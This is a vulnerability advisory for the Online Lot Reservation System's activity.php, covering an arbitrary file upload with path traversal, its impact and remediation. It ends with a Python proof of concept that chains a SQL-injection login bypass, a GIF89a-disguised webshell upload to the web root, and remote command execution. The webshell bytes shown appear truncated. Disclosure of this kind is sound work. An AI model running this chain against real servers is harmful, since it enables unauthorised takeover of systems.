# code-projects Online Lot Reservation System V1.0 Vulnerability Summary ## Vulnerability Overview * **Project Name**: Online Lot Reservation System V1.0 * **Vulnerable File**: `activity.php` * **Vulnerability Type**: Arbitrary File Upload + Path Traversal * **Trigger Conditions**: No authentication or authorization required (Administrator session can be obtained via SQL Injection) * **Root Causes**: 1. **Bypassable File Type Detection**: Uses `getimagesize()` to detect file types; attackers can bypass this by adding the GIF89a magic bytes. 2. **Controllable Directory Parameter**: The `directory` parameter is directly concatenated into the upload path without filtering. 3. **Path Traversal Vulnerability**: Attackers can use `../` to traverse to the root directory. 4. **Unchanged Filename**: The original filename of the uploaded file is used directly without renaming. ## Impact Scope * Attackers can upload malicious files to arbitrary directories. * Attackers can upload files to the web root directory. * Attackers can execute arbitrary system commands remotely. * Attackers may gain complete control over the server. ## Remediation 1. **Strictly Validate Directory Parameters**: Restrict the list of allowed directories. 2. **Prevent Path Traversal**: Replace characters like `../` in paths and verify that the final path is within the allowed scope. 3. **Strict File Type Validation**: Only allow specific extensions (e.g., jpg, jpeg, gif, png). 4. **Verify File MIME Type**: Use tools like `finfo` to validate file header information. 5. **Rename Uploaded Files**: Use random filenames (e.g., via `uniqid()`) to avoid overwriting or predicting filenames. 6. **Disable Execution in Upload Directories**: Configure the web server (e.g., Apache/Nginx) to prevent the execution of PHP files in upload directories. ## POC Code (Python) ```python #!/usr/bin/env python3 import requests from urllib.parse import urljoin url = "http://127.0.0.1:7777" cmd = "system('whoami');" s = requests.Session() # # 1. SQL Injection to Obtain Cookies login_url = urljoin(url, "/onlineLot/loginuser.php") payload = { "email": "admin' OR '1'='1' -- ", "password": "test" } r = s.post(login_url, data=payload, allow_redirects=False) if r.status_code != 302: print("[-] Login failed") exit() print("[+] Login success") # # 2. Upload WebShell (Path traversal to the root directory) upload_url = urljoin(url, "/onlineLot/activity.php") shell = b"GIF89a " files = {'image': ('shell.php', shell, 'image/gif')} data = {'directory': '../', 'date': '2024-05-01', 'id': '1'} r = s.post(upload_url, files=files, data=data, allow_redirects=False) if r.status_code != 302: print("[-] Upload failed") exit() print("[+] Shell uploaded") # # 3. Execute Commands shell_url = urljoin(url, "/onlineLot/shell.php") r = s.get(shell_url, params={'cmd': cmd}) print("[+] Command output:") print(r.text.replace("GIF89a", "").strip()) ```